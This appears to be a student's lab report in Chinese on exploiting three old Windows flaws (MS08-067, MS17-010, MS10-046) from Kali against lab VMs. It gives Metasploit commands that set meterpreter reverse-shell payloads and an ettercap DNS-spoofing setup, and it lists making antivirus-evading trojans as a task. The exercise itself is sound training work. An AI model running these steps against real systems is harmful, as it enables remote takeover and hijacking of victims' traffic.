0107-06-侯舒舒(作业-漏洞测试)
2020 01 07
任务
- 完成三个实验(ms08067,ms17010,ms10046)
- 上述三个实验的具体实验过程(漏洞成因,影响版本等;写md,生成为pdf发送)
- 拓展实验:生成免杀木马文件,生成恶意的apk
第一个实验
- ms08-067
- 实验名称
- ms08-067
- 实验环境
- 攻击机 kali
- 靶机 xp
- 实验原理
- windows的server服务在处理特质请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,SYSTEM权限执行任意命令。
- 实验步骤
- 先使用search搜寻一下
- 在使用use exploit/windows/smb/ms08_067_netapi
- 在show options查看
- 在设置攻击载荷set payload windows/meterpreter/reverse_tcp
- 设置攻击地址,和受害者地址。set rhost 192.168.226.131,set lhost 192.168.226.130
- 攻击 run
- 实验名称
第二个实验
- ms17-010
- 实验名称
- ms17-010
- 实验原理
- Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序
- 实验环境
- 攻击机 kali
- 靶机 Windows 7
- 实验步骤
- 先使用search搜寻一下
- 在使用use exploit/windows/smb/ms17_010_eternalblue
- 在show options查看
- 在设置攻击载荷set payload windows/64/meterpreter/reverse_tcp
- 设置攻击地址,和受害者地址。set rhost 192.168.226.132,set lhost 192.168.226.130
- 攻击 run
- 实验名称
第三个实验
- ms10-046
- 实验名称
- ms10-046
- 实验环境
- 攻击机 kali
- 靶机 xp
- 实验原理
- Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所制定的目标具有相同效果。Windows没有正确的处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在的位置就足以触发这个漏洞
- 实验步骤
- 先使用search搜寻一下
- 在使用use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
- 在show options查看
- 在设置攻击载荷set payload windows/meterpreter/reverse_tcp
- 设置攻击地址,和反转地址。set svhost 192.168.226.130,set lhost 192.168.226.130
- run攻击等待
- 进入/etc/ettcap/ 下的etter.dns 最下面加入一句*.com A 192.168.226.130
- 使用ettercap -T -q -i eth0 -P dns_spoof //// 劫持网段
- 最后靶机输入地址都会跳转到我们给的地址
- 实验名称